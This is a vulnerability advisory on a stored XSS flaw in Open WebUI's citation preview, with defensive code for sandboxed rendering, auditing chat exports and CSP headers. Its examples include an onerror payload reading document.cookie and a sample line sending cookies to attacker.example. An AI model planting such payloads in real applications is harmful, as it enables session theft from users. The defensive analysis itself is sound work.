CVE-2026-26192 Overview
CVE-2026-26192 is a stored Cross-Site Scripting (XSS) vulnerability in Open WebUI, a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.7.0, a user who manually edits their chat history can set an html property inside a citation's document metadata. That property sends the frontend down a code path that treats the document contents as HTML and renders them in an iframe when the citation is previewed. The result is stored XSS via a weaponized document payload in a chat; because the citation is stored with the chat, the payload also executes when the citation is viewed in a shared chat.
Critical Impact
Attackers can execute arbitrary JavaScript in the context of victim users' browsers, potentially stealing session tokens, sensitive data, or performing actions on behalf of authenticated users when they preview citations in manipulated chat histories.
Affected Products
- Open WebUI versions prior to 0.7.0
Discovery Timeline
- 2026-02-19 - CVE CVE-2026-26192 published to NVD
- 2026-02-19 - Last updated in NVD database
Technical Details for CVE-2026-26192
Vulnerability Analysis
This stored XSS vulnerability exists in Open WebUI's citation rendering component, specifically the CitationModal.svelte file. It stems from the frontend trusting the html property in the document metadata attached to a citation. Citations are stored as part of the chat history, and the chat history can be edited by the user who owns it, so an attacker can add html to the metadata of a citation whose document text they also control. When the property is present, the frontend interprets it as an instruction to render the document contents as HTML rather than as plain text.
The vulnerable code path places the manipulated content inside an iframe when the citation is previewed. Since the payload persists in the stored chat history, this is a stored XSS: it fires for any user who previews the compromised citation, including viewers of a shared chat, which considerably widens the set of potential victims beyond the chat's owner.
Root Cause
The root cause is improper neutralization of user-controlled data during page generation (CWE-79) in the citation preview functionality. Two decisions combine: the choice of renderer is driven by a flag (the html metadata property) that lives in user-editable chat data, and the document text selected for that renderer is inserted as markup rather than encoded as text. An attacker who can edit a chat record therefore controls both the switch and the content, and arbitrary HTML and JavaScript is rendered in the victim's browser context.
Attack Vector
The attack is network-based and requires low privileges: an authenticated user who can edit their own chat history. User interaction is required, since a victim must preview the malicious citation for the payload to execute. The attack flow is:
- The attacker edits the stored chat history of a chat they own (for example through the application's chat history editing functionality or by resubmitting a modified chat record)
- The attacker sets the html property in a citation's document metadata and places the payload in that citation's document text
- When any user previews the citation, including via a shared chat link, the browser renders the document text as HTML in an iframe and the JavaScript payload executes
- The payload can then exfiltrate session data, perform actions as the victim, or redirect the victim to a phishing page
The vulnerability manifests in the CitationModal.svelte component at lines 163-170. For detailed technical analysis, see the GitHub Security Advisory GHSA-xc8p-9rr6-97r2 and the vulnerable component source code.
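The following is an added illustration of the decision the advisory describes; it is not Open WebUI's source and does not reproduce CitationModal.svelte. It models the vulnerable branch (a flag stored in user-editable data selects an iframe renderer) next to two hardened alternatives. The function names, the citation record shape ({ document, metadata }) and the return shapes are assumptions made for this example.

```javascript
// Added illustration, not Open WebUI's source: a minimal model of the
// citation preview decision. Function names, the citation record shape
// ({ document, metadata }) and the return shapes are assumptions.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a string so the browser shows it as text instead of parsing it.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Vulnerable pattern: a flag stored in user-editable chat history chooses the
// renderer, so whoever can edit the history chooses to render raw markup.
function previewCitationVulnerable(doc) {
  const meta = doc.metadata || {};
  if (meta.html) {
    // Attacker-controlled markup is handed to the iframe unchanged.
    return { mode: 'iframe', srcdoc: doc.document, sandbox: null };
  }
  return { mode: 'text', text: escapeHtml(doc.document) };
}

// Hardened pattern 1: stored metadata cannot select the renderer at all;
// document text is always shown as text.
function previewCitationTextOnly(doc) {
  return { mode: 'text', text: escapeHtml(doc.document) };
}

// Hardened pattern 2 (if HTML previews are a wanted feature): render inside a
// fully sandboxed iframe. An empty sandbox attribute withholds allow-scripts
// and allow-same-origin, so the markup is displayed but scripts (including
// inline event handlers) do not run and the frame cannot reach the parent's
// origin, storage or cookies.
function previewCitationSandboxed(doc) {
  return { mode: 'iframe', srcdoc: doc.document, sandbox: '' };
}

// Constructed sample: a citation whose metadata was edited to set html: true.
const weaponizedCitation = {
  source: { name: 'notes.txt' },
  document: '<img src=x onerror="alert(document.cookie)">',
  metadata: { html: true },
};

// Run all three renderers over the same stored record for comparison.
function compareRenderers(doc) {
  return {
    vulnerable: previewCitationVulnerable(doc),
    textOnly: previewCitationTextOnly(doc),
    sandboxed: previewCitationSandboxed(doc),
  };
}

console.log(JSON.stringify(compareRenderers(weaponizedCitation), null, 2));
```

The vulnerable branch returns the raw onerror payload as the iframe's srcdoc; the text-only branch returns it HTML-encoded; the sandboxed branch still returns the raw markup but with an empty sandbox attribute, which is the minimum a preview feature needs if it must render untrusted HTML at all. Note that adding allow-scripts to such a sandbox would reopen script execution, and adding allow-same-origin alongside it would give the frame the parent's origin again.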
Detection Methods for CVE-2026-26192
Indicators of Compromise
- An html property appearing in the document metadata of citations within stored chat history records
- Citation document text containing script tags, inline event handlers (onerror, onload and similar), javascript: URIs, or other HTML injection patterns
- User reports of unexpected browser behavior (pop-ups, redirects, unexpected logins) when viewing citations
- Anomalous JavaScript execution or outbound network requests originating from the citation preview iframe
Detection Strategies
- Enable Content Security Policy violation reporting (report-to or report-uri) to surface inline script execution attempts in the citation preview context
- Deploy web application firewall (WAF) rules that inspect the JSON bodies of chat history update requests for common XSS payloads; rules that only inspect URLs will miss this vector
- Monitor application logs for chat history modification patterns involving the html metadata property, bearing in mind that ordinary access logs do not record request bodies and so need to be supplemented with application-level or WAF logging
- Scan stored chat histories (the database or exported chats) for an html property in citation metadata and for HTML/JavaScript injection patterns in citation document text
Monitoring Recommendations
- Enable detailed logging for all chat history modification operations
- Set up alerts for CSP violations related to inline script execution in the citation modal component
- Monitor shared chat access patterns for suspicious activity following citation views
- Implement user behavior analytics to detect anomalous chat history editing patterns
How to Mitigate CVE-2026-26192
Immediate Actions Required
- Upgrade Open WebUI to version 0.7.0 or later immediately
- Audit existing chat histories for malicious html properties in document metadata
- Implement Content Security Policy headers to restrict inline script execution as a defense-in-depth measure
- Review and sanitize any shared chats that may contain compromised citations
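The scan of stored chat histories recommended under Detection Strategies and the audit step in the Immediate Actions above both need the same tool, so one added example serves both; it is not part of the page or of the Open WebUI project. Because chat exports differ in nesting, the walk is schema-agnostic: it flags an html key found inside any object reached through a metadata key, and any string carrying common injection patterns, reporting the JSON path of each hit. The sample export, the finding format and the path notation are constructed assumptions for this example.

```javascript
// Added example, not Open WebUI's code: audit a chat export (any JSON shape)
// for the html metadata flag and for HTML/JS injection patterns in strings.

// Heuristic patterns; expect some false positives on ordinary prose.
const INJECTION_PATTERNS = [
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'event-handler', re: /\bon[a-z]+\s*=/i },
  { name: 'javascript-uri', re: /javascript\s*:/i },
  { name: 'active-element', re: /<\s*(iframe|object|embed|svg|math)\b/i },
];

// Walk the export and return a list of findings with JSON-ish paths.
function scanChatExport(root) {
  const findings = [];
  walk(root, '$', null, findings);
  return findings;
}

// owner is the key under which the current node was reached; arrays are
// transparent so metadata: [{ html: true }] is treated like metadata: { html }.
function walk(node, path, owner, findings) {
  if (Array.isArray(node)) {
    node.forEach((v, i) => walk(v, `${path}[${i}]`, owner, findings));
    return;
  }
  if (node && typeof node === 'object') {
    for (const [key, value] of Object.entries(node)) {
      if (key === 'html' && owner === 'metadata' && value) {
        findings.push({ path: `${path}.${key}`, kind: 'html-flag', value });
      }
      walk(value, `${path}.${key}`, key, findings);
    }
    return;
  }
  if (typeof node === 'string') {
    const hits = INJECTION_PATTERNS.filter((p) => p.re.test(node)).map((p) => p.name);
    if (hits.length) {
      findings.push({ path, kind: 'injection-pattern', patterns: hits, sample: node.slice(0, 80) });
    }
  }
}

// Constructed sample export: one benign citation and one weaponized citation
// whose metadata was edited to set html: true. Real exports may differ.
const sampleExport = {
  chat: {
    title: 'Quarterly notes',
    messages: [
      { role: 'user', content: 'Summarise the attached notes' },
      {
        role: 'assistant',
        content: 'Here is a summary [1]',
        sources: [
          {
            source: { name: 'notes.txt' },
            document: ['Plain text, nothing to see here.'],
            metadata: [{ source: 'notes.txt' }],
          },
          {
            source: { name: 'evil.txt' },
            document: ['<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'],
            metadata: [{ source: 'evil.txt', html: true }],
          },
        ],
      },
    ],
  },
};

console.log(JSON.stringify(scanChatExport(sampleExport), null, 2));
```

To audit a real deployment, replace sampleExport with a parsed chat export (or iterate over chat records pulled from the database) and treat any html-flag finding as a record to quarantine; injection-pattern findings without an accompanying html flag are worth a look but are not by themselves exploitable through this code path.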
Patch Information
Version 0.7.0 of Open WebUI addresses this vulnerability by properly sanitizing document metadata and preventing the unsafe rendering of HTML content from the html property. Organizations should update to this version or later to remediate the vulnerability. Refer to the GitHub Security Advisory for complete patch details.
Workarounds
- Restrict chat history modification capabilities to trusted administrators only until patching is complete
- Disable or limit chat sharing functionality temporarily to reduce exposure
- Implement network-level filtering to block requests containing suspicious HTML/JavaScript patterns in chat modification endpoints
- Browser-side XSS protection extensions may be offered to users who cannot immediately upgrade, but they cannot reliably distinguish application-rendered citation HTML from injected content and are not a substitute for the patch
# Configuration example - Content Security Policy header on an nginx reverse proxy in front of Open WebUI.
# Test in staging first: SvelteKit-based frontends commonly rely on inline bootstrap scripts,
# so a bare script-src 'self' can break the UI unless the application emits nonces or hashes.
# Note also that an iframe populated via srcdoc inherits the parent page's policy, while frame-src
# only governs frames loaded from a URL; which directive matters depends on how the preview builds the iframe.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; frame-src 'self'; object-src 'none';" always;
# Monitor proxy logs for exploitation attempts. Access logs normally record only the request line,
# not the JSON body that carries the html flag, so this only surfaces payloads that reach the URL or
# query string (raw or URL-encoded). Adjust the path to wherever your proxy writes its access log.
grep -Ei '<script|%3Cscript|on[a-z]+=|javascript:' /var/log/open-webui/access.log
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

